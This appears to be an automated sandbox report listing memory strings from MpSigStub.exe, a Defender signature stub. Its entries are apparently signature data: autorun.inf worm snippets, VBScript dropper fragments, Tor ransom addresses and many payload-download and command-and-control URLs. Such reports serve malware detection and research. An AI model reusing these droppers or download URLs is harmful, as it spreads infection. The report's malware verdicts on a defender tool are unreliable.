Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: setaq=fso.getfile(status)iffso.fileexists(tmpt)thenfso.getfile(tmpt).attributes=0aq.copytmpt,truesetaq=fso.getfile(tmpt)aq.attributes=39anv=tmp+"\auto.exe"ifnotfso.fileexists(anv)thenaq.copyanvsetauto=fso.getfile(anv)auto.attributes=0setaut=fso.opentextfile(tmp+an,2,true,0)isi="[autorun]>open=wscript.exe//e:vbscriptthumb.dbauto>shell\open=open>shell\open\command=wscript.exe//e:vbscriptthumb.dbauto>shell\open\default=1>shell\explore=explore>shell\explore\command=wscript.exe//e:vbscriptthumb.dbauto
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: AutoRun.inf
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: AutoRun.inf]
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: %s\autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: [AutoRun]
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: %c:\autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\Runkrag%c:\autorun.inf[AutoRun]
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\Runkrag%c:\autorun.inf[AutoRun]
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: [Autorun]]
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: [autorun]d$open = autorun.exed4shellexecute = autorun.exed
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	Binary or memory string: 0echo[autorun]>"%1:\autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	Binary or memory string: 0echo[autorun]>"%1:\autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	Binary or memory string: [autorun]open=
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	Binary or memory string: g[autorun]open=
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	Binary or memory string: C:\TEMP\\autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	Binary or memory string: C:\TEMP\\autorun.inf]
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	Binary or memory string: [Autorun]d
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	Binary or memory string: [Autorun]
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	Binary or memory string: Autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	Binary or memory string: c:\windows\autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	Binary or memory string: M:\autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	Binary or memory string: [autorun]]
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	Binary or memory string: atr="[autorun]"&vbcrlf&"shellexecute=wscript.exe/e:vbs
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	Binary or memory string: ?atr="[autorun]"&vbcrlf&"shellexecute=wscript.exe/e:vbs
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	Binary or memory string: %windir%\system32\autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	Binary or memory string: AUTORUN.INF
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	Binary or memory string: +autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	Binary or memory string: %sautorun.inf
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	Binary or memory string: :\Autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	Binary or memory string: v[autorun];
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	Binary or memory string: deviceid&"\cysset.exe","-a+hsr")$file=fileopen($objevent.targetinstance.deviceid&"\autorun.inf"
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	Binary or memory string: adeviceid&"\cysset.exe","-a+hsr")$file=fileopen($objevent.targetinstance.deviceid&"\autorun.inf"
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: %c:\Autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	Binary or memory string: %sAutoRun.inf
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	Binary or memory string: %s\AutoRun.inf
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	Binary or memory string: %s:\AutoRun.inf
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	Binary or memory string: .vbs&startautorun.inf&exit
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	Binary or memory string: /cstartservieca.vbs&startautorun.inf&exit
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	Binary or memory string: +/cstartservieca.vbs&startautorun.inf&exit
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	Binary or memory string: [autorun]shellexecute="resycled\boot.com
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	Binary or memory string: /[autorun]shellexecute="resycled\boot.com
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	Binary or memory string: X:\autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	Binary or memory string: autorun.inf4++
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	Binary or memory string: cmd /c del /a autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	Binary or memory string: cmd /c del /a autorun.inf]
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	Binary or memory string: [autorun]Open = action=Abrir carpeta para ver archivos
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	Binary or memory string: I[autorun]
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	Binary or memory string: ;<br/>[autorun]<br/>open=terserah.exe<br/>shellexecute=terserah.exe<br/>action=openfoldert
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	Binary or memory string: t;<br/>[autorun]<br/>open=terserah.exe<br/>shellexecute=terserah.exe<br/>action=openfoldert
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	Binary or memory string: \autorun.inf\
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	Binary or memory string: .*if"%1"=="+"attrib+s+a+h+r%2\autorun.inf:end
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	Binary or memory string: [autorun]shellexecute=recycler\s-6-
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	Binary or memory string: `[autorun]shellexecute=recycler\s-6-

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\1.349.0.0_to_1.351.0.0_mpavbase.vdm._p
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe	File opened: C:\Windows\SERVIC~1\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpavdlta.vdm

Networking:

Yara detected PasteDownloader

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Meterpreter

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Found Tor onion address

Show sources

Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: https://djdkduep62kz4nzx.onion.to/
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: $https://djdkduep62kz4nzx.onion.to/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://babukq4e2p4wu4iq.onion
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: Open link in tor browser: http://gdcbmuveqjsli57x.onion/b93cf40ee63ed066
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: torlink='http://oc6mkf4efqrjp2ue6qp6vmz4ofyjmlo6dtqiklqb2q546bnqeu66tbyd.onion'
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: Qtorlink='http://oc6mkf4efqrjp2ue6qp6vmz4ofyjmlo6dtqiklqb2q546bnqeu66tbyd.onion'

Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: HTTP://www.EEEEEEE.EEE
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	String found in binary or memory: http://%63%61%39%78%2e%63%6f%6d/ken.gif
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://%76%2E%79%61%6F%36%33%2E%63%6F%6D/url.asp
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://%76%2E%79%61%6F%36%33%2E%63%6F%6D/url.asp%C5%E4%D6%C3%D0%C5%CF%A2
Source: MpSigStub.exe, 00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp	String found in binary or memory: http://%HOST%/client/install.htm?cid=%CID%
Source: MpSigStub.exe, 00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp	String found in binary or memory: http://%HOST%/client/open.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp	String found in binary or memory: http://%HOST%/client/run.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp	String found in binary or memory: http://%HOST%/client/scan.htm?GUID=%GUID%&cid=%CID%x
Source: MpSigStub.exe, 00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp	String found in binary or memory: http://%HOST%/client/uninstall.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp	String found in binary or memory: http://%HOST%/client/update.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://%d.%d.%d.%d:3128/
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp	String found in binary or memory: http://%d.ctrl.%s
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp	String found in binary or memory: http://%d.ctrl.%saf
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://%domain%/config.php
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://%domain%/content.php?se_id=%d&q=%s&page=%s&ua=%s&al=%s&aff_id=%s&sub_id=%s
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://%domain%/update.php
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://%domain%/update.phpa
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://%s%simg.jpg
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: http://%s.com/registerguid.php?guid=
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://%s/%04d-%02d/%04d%02d%02d%02d%02d%02d.png
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://%s/%s/s_estr.php?id=%s&str=705-%sd
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://%s/%s/s_report.php?task=%u&id=%s
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp	String found in binary or memory: http://%s/?aid=%shttp://%s/sync.php
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp	String found in binary or memory: http://%s/any2/%s-direct.ex
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp	String found in binary or memory: http://%s/any2/%s-direct.exx
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp	String found in binary or memory: http://%s/asghfd.php?&&u=%u&p=%u&lang
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp	String found in binary or memory: http://%s/asghfd.php?&&u=%u&p=%u&langad
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	String found in binary or memory: http://%s/banner3.php?q=%d.%d.%d.%d.%d.%s.1.%d.%d
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://%s/block.phpa
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp	String found in binary or memory: http://%s/buy_online.php
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp	String found in binary or memory: http://%s/buy_online.phpa
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: http://%s/d1c.dat
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	String found in binary or memory: http://%s/dupe.php?q=%d.%d.%d.%d.%d.%s.1.%d
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp	String found in binary or memory: http://%s/features.php
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	String found in binary or memory: http://%s/ftp/g.php
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://%s/go.php?gcode=%s
Source: MpSigStub.exe, 00000024.00000003.6270502727.00000197A468A000.00000004.00000001.sdmp	String found in binary or memory: http://%s/httpss/setup.php?action=4&mk=%s&aid=%s
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://%s/in.php
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://%s/index.htm?content=%s&id=%d
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://%s/index.htm?id=%4d&content=%s
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	String found in binary or memory: http://%s/information.php?a=%s&b=%d&c=%d
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	String found in binary or memory: http://%s/information.php?a=%s&b=%d&c=%dxL
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: http://%s/inspection.aspx?index=stripbooks
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://%s/jbinfo.cgi?%s:%d
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	String found in binary or memory: http://%s/js.php?affid=%s&kw=%s
Source: MpSigStub.exe, 00000024.00000003.6286203133.00000197A3ABB000.00000004.00000001.sdmp	String found in binary or memory: http://%s/js3.php?kws=%%s&q=%%s&%%s
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp	String found in binary or memory: http://%s/kx.php
Source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp	String found in binary or memory: http://%s/live.php?backupquery=%s
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://%s/loads.php
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://%s/loads2.php?r=%s
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: http://%s/mirror/ret.aspx?content=%s
Source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp	String found in binary or memory: http://%s/poiehrgb.php?&advid=0000
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp	String found in binary or memory: http://%s/search/search.cgi?s
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://%s/search/search.cgi?src=autosearch&s=%s
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp	String found in binary or memory: http://%s/support.php
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp	String found in binary or memory: http://%s/sync.php
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://%s:%d/%s%d%08dindex.asp?ToDowbSVCHOST.EXErbSeDe
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://%s:%d/%s%d%sindex.asp?%u%dOEMCP
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://%s:%d/%sPOSTid=41.php?
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://%sMozilla/4.0
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: http://(.-/)
Source: MpSigStub.exe, 00000024.00000003.6273043144.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://.(www.blackcheta.blogspot.com/)
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://.exeuser32.dll
Source: MpSigStub.exe, 00000024.00000003.6229929208.0000019793FDC000.00000004.00000001.sdmp	String found in binary or memory: http://.ocx.cabhtml:file:ftp://
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	String found in binary or memory: http://.zdropp.co.cc/download.php?token=
Source: MpSigStub.exe, 00000024.00000003.6273043144.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://0-2-t-9-r-6-p-4-4-4-s-0-h-e-.i-k-r-g-1-0-u-5-1-f-3-g-li-9-p-1-x-t-6-g-l-8-m-q-y-s-k-6-l.info
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://0.82211.net/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://00.1.00.2.1.11.9.online.secured.adobe.protected.file.version.9.8.online.verification.access.v
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	String found in binary or memory: http://0147.0131.0133.0174/..----------------------....................-.....................-/.....
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp	String found in binary or memory: http://03ptc6fk0.ru/clogs/index.php?
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://0d91.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://0vyk.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://1-0-9.cn/zxc/index.htm
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: http://1.wangyouxf.cn/index.htmwidth=0height=0
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: http://10.103.2.247
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://10.24.13.102/office.png
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: http://103.133.106.72/ini/................wbk
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://103.140.251.93/_....-------------------------.....------------_----/
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://103.149.12.183/bigi.doc
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://103.149.12.183/p1.doc
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://103.149.12.183/u1.doc
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://103.213.245.135/n.hta
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://103.49.146.132/OpenCL.dll
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://103.49.146.132/cpu_tromp_AVX.dll
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://103.49.146.132/cpu_tromp_SSE2.dll
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://103.49.146.132/cudart32_80.dll
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://103.49.146.132/svchost.exe
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://104.153.45.242/~cimbonli//wp-content/upload/ken.exe
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://104.236.94.
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	String found in binary or memory: http://104.243.35.43
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: http://107.170.47.94/mdsatalho/
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	String found in binary or memory: http://107.172.130.145/
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: http://107.173.191.48/deck/m.dot
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: http://107.173.219.115:4560/press1.exe
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: http://107.173.219.80/
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://107.189.10.150/ht/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://108.61.208.60
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://109.248.148.42/officedocument/2006/relationships/templates.dotm
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://110.34.232.11:1314
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp	String found in binary or memory: http://110.42.4.180:
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://112.164.188.12/hza.html
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://114.108.151.148/lib/lib.asp
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://118.184.48.95:8000/info
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://119.249.54.113/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://119.92.89.144/tmp/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://120.125.201.101/logo/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: http://120061996-783405463700123057.preview.editmysite.com/uploads/1/2/0
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://121.14.
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://122.228.228.7
Source: MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp	String found in binary or memory: http://123support.online/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://123zphimonline.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1/down/list2.txt
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1/m.htmwidth=0height=0
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1/tracking?source=
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:20202/remind.html
